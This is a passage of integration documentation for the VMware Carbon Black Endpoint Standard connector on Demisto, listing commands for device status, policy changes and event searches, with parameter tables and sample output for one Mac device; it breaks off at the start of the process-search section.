VMware Carbon Black Endpoint Standard
Overview
Use the VMware Carbon Black Endpoint Standard integration to manage Carbon Black policies, devices and processes on Demisto.
Use cases
- Get information about events, policies, devices, and processes on Carbon Black.
- Update events, policies, devices, and processes on Carbon Black.
- Delete rules from policies.
- Create new policies.
Configure VMware Carbon Black Endpoint Standard on Demisto
- Navigate to Settings > Integrations > Servers & Services.
- Search for VMware Carbon Black Endpoint Standard.
-
Click
Add instance
to create and configure a new integration.
- Name : a textual name for the integration instance.
- Server URL (example: https://192.168.0.1)
- API Key
- API Version
- Connector ID
- Fetch incidents
- Incident type
- SIEM key: Use to fetch incidents.
- SIEM Connector ID: Use to fetch incidents.
- Do not validate server certificate (not secure)
- Use system proxy settings
- Click Test to validate the URLs, token, and connection.
Commands
- Get the status of multiple devices:Â cbd-get-devices-status
- Get the status of a specified device:Â cbd-get-device-status
- Change the security policy assigned to a device: cbd-change-device-status
- Get multiple events:Â cbd-find-events
- Get a specified event:Â cbd-find-event
- Get multiple processes:Â cbd-find-processes
- Get alert details:Â cbd-get-alert-details
- Get all policy details:Â cbd-get-policies
- Get the details of a specified policy:Â cbd-get-policy
- Create a policy:Â cbd-create-policy
- Update a policy:Â cbd-update-policy
- Delete a policy:Â cbd-delete-policy
- Add a rule to a policy:Â cbd-add-rule-to-policy
- Delete a rule from a policy:Â cbd-delete-rule-from-policy
- Update a rule in a policy:Â cbd-update-rule-in-policy
- Set a policy:Â cbd-set-policy
Get the status of multiple devices
Retrieves the status of multiple devices, as specified by further input.
Base Command
cbd-get-devices-status
Input
Parameter | Description | More Information |
hostName |
Host name of the device to search for. |
Case insensitive |
hostNameExact | Exact host name of device to search for | Case sensitive |
ownerName |
Device owner name |
Case insensitive |
ownerNameExact | Exact device owner name | Case sensitive |
ipAddress | External or internal IP address of the device to search for | - |
start |
Shows result from this row and after |
- |
rows |
Maximum number of rows of result. |
This parameter can be limited on the Cb Defense server side |
Context Output
Path | Description |
CarbonBlackDefense.GetDevicesStatus.Results.ActivationCodeExpiryTime | Activation code expiry time |
CarbonBlackDefense.GetDevicesStatus.Results.LastExternalIpAddress | Last external IP address |
CarbonBlackDefense.GetDevicesStatus.Results.LastLocation | Last location |
CarbonBlackDefense.GetDevicesStatus.Results.LastReportedTime | Last reported time |
CarbonBlackDefense.GetDevicesStatus.Results.LastShutdownTime | Last shutdown time |
CarbonBlackDefense.GetDevicesStatus.Results.OsVersion | Operating system version |
CarbonBlackDefense.GetDevicesStatus.Results.PolicyId | Policy ID |
CarbonBlackDefense.GetDevicesStatus.Results.RegisteredTime | Registered time |
CarbonBlackDefense.GetDevicesStatus.Results.Status | Status |
CarbonBlackDefense.GetDevicesStatus.Results.DeviceId | Device ID |
CarbonBlackDefense.GetDevicesStatus.Results.DeviceOwnerId | Device owner ID |
CarbonBlackDefense.GetDevicesStatus.Results.DeviceType Description | Device type |
CarbonBlackDefense.GetDevicesStatus.Results.OrganizationId | Organization ID |
CarbonBlackDefense.GetDevicesStatus.Results.SensorVersion | Sensor version |
CarbonBlackDefense.GetDevicesStatus.Results.TargetPriorityType | Target priority type |
CarbonBlackDefense.GetDevicesStatus.Results.Email | Email address |
CarbonBlackDefense.GetDevicesStatus.Results.LastContact | Last contact |
CarbonBlackDefense.GetDevicesStatus.Results.OrganizationName | Organization name |
CarbonBlackDefense.GetDevicesStatus.Results.SensorStates | Sensor states |
CarbonBlackDefense.GetDevicesStatus.Results.AvStatus | AV status |
CarbonBlackDefense.GetDevicesStatus.Results.LastInternalIpAddress | Last internal IP address |
CarbonBlackDefense.GetDevicesStatus.Results.Name | Name |
CarbonBlackDefense.GetDevicesStatus.Results.PolicyName | Policy name |
CarbonBlackDefense.GetDevicesStatus.Results.SensorOutOfDate | Sensor out-of-date |
CarbonBlackDefense.GetDevicesStatus.Results.TestId | Test ID |
Command Example
!cbd-get-devices-status rows="1"
Context Example
CarbonBlackDefense:{} 1 item GetDevicesStatus:{} 1 item Results:{} 25 items ActivationCodeExpiryTime:1524157210454 AvStatus:null LastContact:1533646970617 LastLocation:OFFSITE Name:cberninger-mac2 LastExternalIpAddress:67.143.208.113 TestId:-1 PolicyId:6525 OrganizationId:1105 RegisteredTime:1523552410489 TargetPriorityType:MEDIUM DeviceType:MAC DeviceId:844355 Status:REGISTERED OsVersion:MAC OS X 10.10.5 LastReportedTime:1533642023089 DeviceOwnerId:278380 LastShutdownTime:1533587921518 SensorOutOfDate:false LastInternalIpAddress:192.168.2.125 SensorStates:[] 5 items 0:ACTIVE 1:LIVE_RESPONSE_NOT_RUNNING 2:LIVE_RESPONSE_NOT_KILLED 3:LIVE_RESPONSE_DISABLED 4:SECURITY_CENTER_OPTLN_DISABLED Email:cberninger PolicyName:default OrganizationName:cb-internal-alliances.com SensorVersion:3.0.2.8
Human Readable Output
ActivationCodeExpiryTime | 1524157210454 |
---|---|
AvStatus | |
DeviceId | 844355 |
DeviceOwnerId | 278380 |
DeviceType | MAC |
cberninger | |
LastContact | 1533646970617 |
LastExternalIpAddress | 67.143.208.113 |
LastInternalIpAddress | 192.168.2.125 |
LastLocation | OFFSITE |
LastReportedTime | 1533642023089 |
LastShutdownTime | 1533587921518 |
Name | cberninger-mac2 |
OrganizationId | 1105 |
OrganizationName | cb-internal-alliances.com |
OsVersion | MAC OS X 10.10.5 |
PolicyId | 6525 |
PolicyName | default |
RegisteredTime | 1523552410489 |
SensorOutOfDate | false |
Get the status of a specified device
Retrieves the status of a specified device.
Base Code
cbd-get-device-status
Input
Parameter | Description |
deviceId |
Individual device ID |
Context Output
Path | Description |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.TargetPriorityType | Target priority type |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OrganizationId | Organization ID |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.CreateTime | Time of creation |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceId | Device ID |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Email | Email address |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastInternalIpAddress | Last internal IP address |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastLocation | Last location |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OsVersion | Operating system version |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.AvStatus | AV status |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastExternalIpAddress | Last external IP address |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RegisteredTime | Time of registration |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastContact | Last contact |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Status | Status |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.TestId | Test ID |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.PolicyId | Policy ID |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.UpdateVersion | Update version |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OrganizationName | Organization name |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RootedByAnalytics | Rooted ByAnalytics |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorVersion | Sensor version |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceType | Device type |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.PolicyName | Policy name |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RootedByAnalyticsTime | Rooted ByAnalytics Time |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorOutOfDate | Sensor out-of-date |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorStates | Sensor states |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Name | Name |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Id | ID |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastReportedTime | Last reported time |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceOwnerId | Device owner ID |
Command Example
!cbd-get-device-status deviceId="844355"
Context Example
CarbonBlackDefense:{} 1 item GetDeviceStatus:{} 1 item DeviceInfo:{} 25 items ActivationCodeExpiryTime:null AvStatus:null LastContact:1533648166041 LastLocation:OFFSITE Name:cberninger-mac2 LastExternalIpAddress:67.143.208.113 TestId:-1 PolicyId:6525 OrganizationId:1105 RegisteredTime:1523552410489 TargetPriorityType:MEDIUM DeviceType:MAC DeviceId:844355 Status:REGISTERED OsVersion:MAC OS X 10.10.5 LastReportedTime:1533642023089 DeviceOwnerId:278380 LastShutdownTime:1533587921518 SensorOutOfDate:false LastInternalIpAddress:192.168.2.125 SensorStates:[] 5 items 0:ACTIVE 1:LIVE_RESPONSE_NOT_RUNNING 2:LIVE_RESPONSE_NOT_KILLED 3:LIVE_RESPONSE_DISABLED 4:SECURITY_CENTER_OPTLN_DISABLED Email:cberninger PolicyName:default OrganizationName:cb-internal-alliances.com SensorVersion:3.0.2.8
Human Readable Output
ActivationCodeExpiryTime | |
---|---|
AvStatus | |
DeviceId | 844355 |
DeviceOwnerId | 278380 |
DeviceType | MAC |
cberninger | |
LastContact | 1533648166041 |
LastExternalIpAddress | 67.143.208.113 |
LastInternalIpAddress | 192.168.2.125 |
LastLocation | OFFSITE |
LastReportedTime | 1533642023089 |
LastShutdownTime | 1533587921518 |
Name | cberninger-mac2 |
OrganizationId | 1105 |
OrganizationName | cb-internal-alliances.com |
OsVersion | MAC OS X 10.10.5 |
PolicyId | 6525 |
PolicyName | default |
RegisteredTime | 1523552410489 |
SensorOutOfDate | false |
Change the security policy assigned to a device
Changes the security policy assigned to a specified device.
Base Command
cbd-change-device-status
Input
Parameter | Description |
deviceId |
The device ID |
policyId |
The policy ID |
policyName |
The policy name |
Context Output
Path | Description |
---|---|
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.TargetPriorityType | Target priority type |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OrganizationId | Organization ID |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.CreateTime | Time of creation |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceId | Device ID |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Email | Email address |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastInternalIpAddress | Last internal IP address |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastLocation | Last location |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OsVersion | Operating system version |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.AvStatus | Anti-virus status |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastExternalIpAddress | Last external IP address |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RegisteredTime | Registration time |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastContact | Last contact |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Status | Status |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.TestId | Test ID |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.PolicyId | Policy ID |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.UpdateVersion | Update version |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.OrganizationName | Organization name |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RootedByAnalytics | Rooted ByAnalytics |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorVersion | Sensor version |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceType | Device type |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.PolicyName | Policy name |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.RootedByAnalyticsTime | Rooted ByAnalytics time |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorOutOfDate | Sensor out-of-date date |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.SensorStates | Sensor states |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Name | Name |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.Id | ID |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.LastReportedTime | Time of last report |
CarbonBlackDefense.GetDeviceStatus.DeviceInfo.DeviceOwnerId | Device owner ID |
Command Example
!cbd-change-device-status deviceId="844355" policyName="default"
Context Example
CarbonBlackDefense:{} 1 item ChangeDeviceStatus:{} 1 item DeviceInfo:{} 24 items AvStatus:null LastContact:1533648445513 LastLocation:OFFSITE Name:cberninger-mac2 LastExternalIpAddress:67.143.208.113 TestId:-1 PolicyId:6525 OrganizationId:1105 RegisteredTime:1523552410489 TargetPriorityType:MEDIUM DeviceType:MAC DeviceId:844355 Status:REGISTERED OsVersion:MAC OS X 10.10.5 LastReportedTime:1533642023089 DeviceOwnerId:278380 LastShutdownTime:1533587921518 SensorOutOfDate:false LastInternalIpAddress:192.168.2.125 SensorStates:[] 5 items 0:ACTIVE 1:LIVE_RESPONSE_NOT_RUNNING 2:LIVE_RESPONSE_NOT_KILLED 3:LIVE_RESPONSE_DISABLED 4:SECURITY_CENTER_OPTLN_DISABLED Email:cberninger PolicyName:default OrganizationName:cb-internal-alliances.com SensorVersion:3.0.2.8
Human Readable Output
AvStatus | |
---|---|
DeviceId | 844355 |
DeviceOwnerId | 278380 |
DeviceType | MAC |
cberninger | |
LastContact | 1533648445513 |
LastExternalIpAddress | 67.143.208.113 |
LastInternalIpAddress | 192.168.2.125 |
LastLocation | OFFSITE |
LastReportedTime | 1533642023089 |
LastShutdownTime | 1533587921518 |
Name | cberninger-mac2 |
OrganizationId | 1105 |
OrganizationName | cb-internal-alliances.com |
OsVersion | MAC OS X 10.10.5 |
PolicyId | 6525 |
PolicyName | default |
RegisteredTime | 1523552410489 |
SensorOutOfDate | false |
SensorStates | ACTIVE,LIVE_RESPONSE_NOT_RUNNING,LIVE_RESPONSE_NOT_KILLED,LIVE_RESPONSE_DISABLED,SECURITY_CENTER_OPTLN_DISABLED |
Get multiple events
Returns multiple event details, as specified by further input.
Base Command
cbd-find-events
Input
Parameter | Description | More Information |
hostName |
The host name of the event to search for |
Case in sensitive. |
hostNameExact | The exact host name of the event to find | Case sensitive. |
ownerName | Owner name of the event to search for | Case in sensitive. |
ownerNameExact | The exact owner name of the event to search for | Case sensitive. |
ipAddress |
External or internal IP address |
- |
sha256hash |
Searches for events generated by a process with this SHA-256 hash |
Must be in lowercase. |
applicationName |
Searches for events generated by a process with this application name |
Must be in lowercase. |
eventType | Searches for events associated with this event type | - |
searchWindow |
Events generated within this time frame |
Default is one day. Events might not be available after 30 days due to retention policies. |
start | Shows result from this row and after | - |
rows | Maximum number of rows of result | This parameter can be limited on the Cb Defense server side. |
Context Output
Path | Description |
CarbonBlackDefense.FindEvents.Results.EventType | Event type |
CarbonBlackDefense.FindEvents.Results.ProcessDetails.MilisSinceProcessStart | Milliseconds since the beginning of the process |
CarbonBlackDefense.FindEvents.Results.ProcessDetails.Name | Name |
CarbonBlackDefense.FindEvents.Results.ProcessDetails.PrivatePid | Private PID |
CarbonBlackDefense.FindEvents.Results.ProcessDetails.ProcessId | Process ID |
CarbonBlackDefense.FindEvents.Results.ShortDescription | Short description |
CarbonBlackDefense.FindEvents.Results.CreateTime | Time of creation |
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceName | Device name |
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceVersion | Device version |
CarbonBlackDefense.FindEvents.Results.DeviceDetails.PolicyName | Policy name |
CarbonBlackDefense.FindEvents.Results.DeviceDetails.TargetPriorityType | Target priority type |
CarbonBlackDefense.FindEvents.Results.DeviceDetails.AgentLocation | Agent location |
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceId | Device ID |
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceIpV4Address | IpV4 address of the device |
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.AreaCode | Area code |
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.CountryCode | Country code |
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.Latitude | Latitude |
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.Longitude | Longitude |
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.City | City |
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.CountryName | Country name |
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.DmaCode | DMA code |
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.MetroCode | Metro code |
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.PostalCode | Postal code |
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceLocation.Region | Region |
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceIpAddress | Device IP address |
CarbonBlackDefense.FindEvents.Results.DeviceDetails.DeviceType | Device type |
CarbonBlackDefense.FindEvents.Results.DeviceDetails.Email | Email address |
CarbonBlackDefense.FindEvents.Results.DeviceDetails.TargetPriorityCode | Target priority code |
CarbonBlackDefense.FindEvents.Results.EventId | Event ID |
CarbonBlackDefense.FindEvents.Results.EventTime | Event time |
CarbonBlackDefense.FindEvents.Results.LongDescription | Long description |
CarbonBlackDefense.FindEvents.Results.NetFlow.DestAddress | Dest address |
CarbonBlackDefense.FindEvents.Results.NetFlow.DestPort | Dest port |
CarbonBlackDefense.FindEvents.Results.NetFlow.PeerFqdn | Peer Fqdn |
CarbonBlackDefense.FindEvents.Results.NetFlow.PeerIpAddress | Peer IP address |
CarbonBlackDefense.FindEvents.Results.NetFlow.PeerIpV4Address | Peer IpV4 address |
CarbonBlackDefense.FindEvents.Results.NetFlow.Service | Service |
CarbonBlackDefense.FindEvents.Results.NetFlow.SourceAddress | Source address |
CarbonBlackDefense.FindEvents.Results.NetFlow.SourcePort | Source port |
CarbonBlackDefense.FindEvents.Results.SelectedApp.ApplicationName | Application name |
CarbonBlackDefense.FindEvents.Results.SelectedApp.ApplicationPath | Application path |
CarbonBlackDefense.FindEvents.Results.SelectedApp.Md5Hash | MD5 hash |
CarbonBlackDefense.FindEvents.Results.SelectedApp.Sha256Hash | SHA-256 hash |
CarbonBlackDefense.FindEvents.Results.ThreatIndicators | Threat indicators |
Command Example
!cbd-find-events rows=1
</p?
Context Example
CarbonBlackDefense:{} 1 item FindEvents:{} 2 items Results:{} 10 items ShortDescription:The application "cloud-drive-ui" successfully closed a TCP/6690 connection to 192.168.2.22:6690 (192.168.2.22). LongDescription:The application "/Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui" closed a TCP/6690 connection to 192.168.2.22:6690 (192.168.2.22) from 192.168.2.125:56001. There were 8169 Bytes Received and 2863 Bytes Sent in less than 1 second. The device was off the corporate network using the public address 67.143.208.113 (192.168.2.125, located in United States). The operation was successful. SelectedApp:{} 7 items ApplicationName:cloud-drive-ui ApplicationPath:/Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui EffectiveReputation:LOCAL_WHITE EffectiveReputationSource:PRE_EXISTING Md5Hash:b43632f807770d141008deb988a65ad9 ReputationProperty:NOT_LISTED Sha256Hash:f649ce0c8d5ca63be86e00877632c6390af772eed86c07b3db5b818c30ab700b EventTime:1533649991975 CreateTime:1533650036964 DeviceDetails:{} 12 items DeviceName:cberninger-mac2 DeviceVersion:MAC OS X 10.10.5 TargetPriorityCode:1 DeviceLocation:{} 6 items City:null CountryCode:US CountryName:United States Latitude:37.751007 Longitude:-97.822 Region:null TargetPriorityType:MEDIUM DeviceType:MAC DeviceId:844355 DeviceIpAddress:67.143.208.113 DeviceIpV4Address:67.143.208.113 AgentLocation:OFFSITE Email:cberninger PolicyName:default TargetApp:{} 5 items ApplicationName:null EffectiveReputation:null EffectiveReputationSource:null ReputationProperty:null Sha256Hash:null ProcessDetails:{} 11 items FullUserName:cberninger PrivatePid:1071-1533502548722-245 ProcessId:1071 Name:cloud-drive-ui TargetCommandLine:null MilisSinceProcessStart:147443253 UserName:cberninger TargetPrivatePid:null TargetPid:null TargetName:null CommandLine:null EventType:NETWORK EventId:4ad25ae99a4911e88515b3c49ffeda59 TotalResults:{} 1 item TotalResults:10666 Endpoint:{} 4 items Domain:null Hostname:cberninger-mac2 IPAddress:67.143.208.113 OS:MAC Process:{} 9 items Path:null SHA1:null ParentID:null PID:1071 Name:cloud-drive-ui Endpoint:null ParentName:null MD5:null CommandLine:null
Human Readable
CreateTime | 1533650036964 |
---|---|
DeviceDetails AgentLocation | OFFSITE |
DeviceDetails DeviceId | 844355 |
DeviceDetails DeviceIpAddress | 67.143.208.113 |
DeviceDetails DeviceIpV4Address | 67.143.208.113 |
DeviceDetails DeviceLocation City | |
DeviceDetails DeviceLocation CountryCode | US |
DeviceDetails DeviceLocation CountryName | United States |
DeviceDetails DeviceLocation Latitude | 37.751007 |
DeviceDetails DeviceLocation Longitude | -97.822 |
DeviceDetails DeviceLocation Region | |
DeviceDetails DeviceName | cberninger-mac2 |
DeviceDetails DeviceType | MAC |
DeviceDetails DeviceVersion | MAC OS X 10.10.5 |
DeviceDetails Email | cberninger |
DeviceDetails PolicyName | default |
DeviceDetails TargetPriorityCode | 1 |
DeviceDetails TargetPriorityType | MEDIUM |
EventId | 4ad25ae99a4911e88515b3c49ffeda59 |
EventTime | 1533649991975 |
Get a specified event
Returns a the details of a specified event.
Base Command
cbd-find-event
Input
Parameter | Description |
eventId | Event ID |
Context Output
Path | Description |
CarbonBlackDefense.GetAlertDetails.EventInfo.ShortDescription | Short description |
CarbonBlackDefense.GetAlertDetails.EventInfo.TargetHash.ApplicationName | Application name |
CarbonBlackDefense.GetAlertDetails.EventInfo.TargetHash.ReputationProperty | Reputation property |
CarbonBlackDefense.GetAlertDetails.EventInfo.TargetHash.Sha256Hash | SHA-256 hash |
CarbonBlackDefense.GetAlertDetails.EventInfo.EventType | Event type |
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessHash.Md5Hash | MD5 hash |
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessHash.Sha256Hash | SHA-256 hash |
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessHash.ApplicationPath | Application path |
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessHash.ReputationProperty | Reputation property |
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessHash.ApplicationName | Application name |
CarbonBlackDefense.GetAlertDetails.EventInfo.OrgDetails.OrganizationId | Organization ID |
CarbonBlackDefense.GetAlertDetails.EventInfo.OrgDetails.OrganizationName | Organization name |
CarbonBlackDefense.GetAlertDetails.EventInfo.OrgDetails.OrganizationType | Organization type |
CarbonBlackDefense.GetAlertDetails.EventInfo.ParentHash.ApplicationName | Application name |
CarbonBlackDefense.GetAlertDetails.EventInfo.ParentHash.Sha256Hash | SHA-256 hash |
CarbonBlackDefense.GetAlertDetails.EventInfo.EventId | Event ID |
CarbonBlackDefense.GetAlertDetails.EventInfo.LongDescription | Long description |
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceIpV4Address | Device IpV4 address |
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceType | Device type |
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.Email | Email address |
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.TargetPriorityCode | Target priority code |
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.AgentLocation | Agent location path |
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceHostName | Device host name |
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceId | Device ID |
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.GroupName | Group name |
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceVersion | Device version |
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.TargetPriorityType | Target priority type |
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceIpAddress | Device IP address |
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.Latitude | Latitude |
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.City | City |
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.CountryCode | Country code |
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.DmaCode | DMA code |
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.Longitude | Longitude |
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.MetroCode | Metro code |
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.PostalCode | Postal code |
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.Region | Region |
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.AreaCode | Area code |
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceLocation.CountryName | Country name |
CarbonBlackDefense.GetAlertDetails.EventInfo.DeviceDetails.DeviceName | Device name |
CarbonBlackDefense.GetAlertDetails.EventInfo.CreateTime | Time of creation |
CarbonBlackDefense.GetAlertDetails.EventInfo.EventTime | Event time |
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.FullUserName | Full user name |
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.Name | Name |
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.ParentCommandLine | Parent command line |
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.ParentName | Parent name |
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.ParentPid | Parent PID |
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.ProcessId | Process ID |
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.CommandLine | Command line |
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.MilisSinceProcessStart | Milisecconds since process start |
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.TargetCommandLine | Target command line |
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.TargetPid | Target PID |
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.UserName | User name |
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.ParentPrivatePid | Parent private PID |
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.PrivatePid | Private PID |
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.TargetName | Target name |
CarbonBlackDefense.GetAlertDetails.EventInfo.ProcessDetails.TargetPrivatePid | Target private PID |
CarbonBlackDefense.GetAlertDetails.EventInfo.ThreatIndicators | Threat indicators |
Command Example
!cbd-find-event eventId="4ad25ae99a4911e88515b3c49ffeda59"
Context Example
CarbonBlackDefense:{} 1 item FindEvent:{} 1 item EventInfo:{} 13 items ShortDescription:The application "cloud-drive-ui" successfully closed a TCP/6690 connection to 192.168.2.22:6690 (192.168.2.22). LongDescription:The application "/Users/cberninger/.CloudStation/CloudStation.app/Contents/MacOS/cloud-drive-ui" closed a TCP/6690 connection to 192.168.2.22:6690 (192.168.2.22) from 192.168.2.125:56001. There were 8169 Bytes Received and 2863 Bytes Sent in less than 1 second. The device was off the corporate network using the public address 67.143.208.113 (192.168.2.125, located in United States). The operation was successful. EventTime:1533649991975 CreateTime:1533650036964 DeviceDetails:{} 13 items DeviceName:cberninger-mac2 DeviceVersion:MAC OS X 10.10.5 TargetPriorityCode:1 DeviceHostName:null GroupName:null DeviceLocation:{} 10 items CountryName:United States CountryCode:US DmaCode:0 MetroCode:0 City:null Latitude:37.751007 Longitude:-97.822 Region:null PostalCode:null AreaCode:0 TargetPriorityType:MEDIUM DeviceType:MAC DeviceId:844355 DeviceIpAddress:67.143.208.113 DeviceIpV4Address:67.143.208.113 AgentLocation:OFFSITE Email:cberninger ProcessDetails:{} 15 items ParentPid:null FullUserName:cberninger PrivatePid:1071-1533502548722-245 ProcessId:1071 Name:cloud-drive-ui TargetCommandLine:null ParentPrivatePid:null MilisSinceProcessStart:147443253 ParentName:null ParentCommandLine:null UserName:cberninger TargetPrivatePid:null TargetPid:null TargetName:null CommandLine:null EventType:NETWORK EventId:4ad25ae99a4911e88515b3c49ffeda59 ParentHash:{} 2 items ApplicationName:null Sha256Hash:null ProcessHash:{} 5 items ApplicationName:null ApplicationPath:null Md5Hash:null ReputationProperty:null Sha256Hash:null ThreatIndicators:[] 2 items 0:UNKNOWN_APP 1:NETWORK_FLOW OrgDetails:{} 3 items OrganizationId:null OrganizationName:null OrganizationType:null TargetHash:{} 3 items ApplicationName:null ReputationProperty:null Sha256Hash:null
Human Readable Output
CreateTime | 1533650036964 |
---|---|
DeviceDetails AgentLocation | OFFSITE |
DeviceDetails DeviceHostName | |
DeviceDetails DeviceId | 844355 |
DeviceDetails DeviceIpAddress | 67.143.208.113 |
DeviceDetails DeviceIpV4Address | 67.143.208.113 |
DeviceDetails DeviceLocation AreaCode | 0 |
DeviceDetails DeviceLocation City | |
DeviceDetails DeviceLocation CountryCode | US |
DeviceDetails DeviceLocation CountryName | United States |
DeviceDetails DeviceLocation DmaCode | 0 |
DeviceDetails DeviceLocation Latitude | 37.751007 |
DeviceDetails DeviceLocation Longitude | -97.822 |
DeviceDetails DeviceLocation MetroCode | 0 |
DeviceDetails DeviceLocation PostalCode | |
DeviceDetails DeviceLocation Region | |
DeviceDetails DeviceName | cberninger-mac2 |
DeviceDetails DeviceType | MAC |
DeviceDetails DeviceVersion | MAC OS X 10.10.5 |
DeviceDetails Email | cberninger |
Get multiple processes
Returns the details of multiple process, as specified by further input.
Base Command
cbd-find-processes
Input
Parameter | Description | More Information |
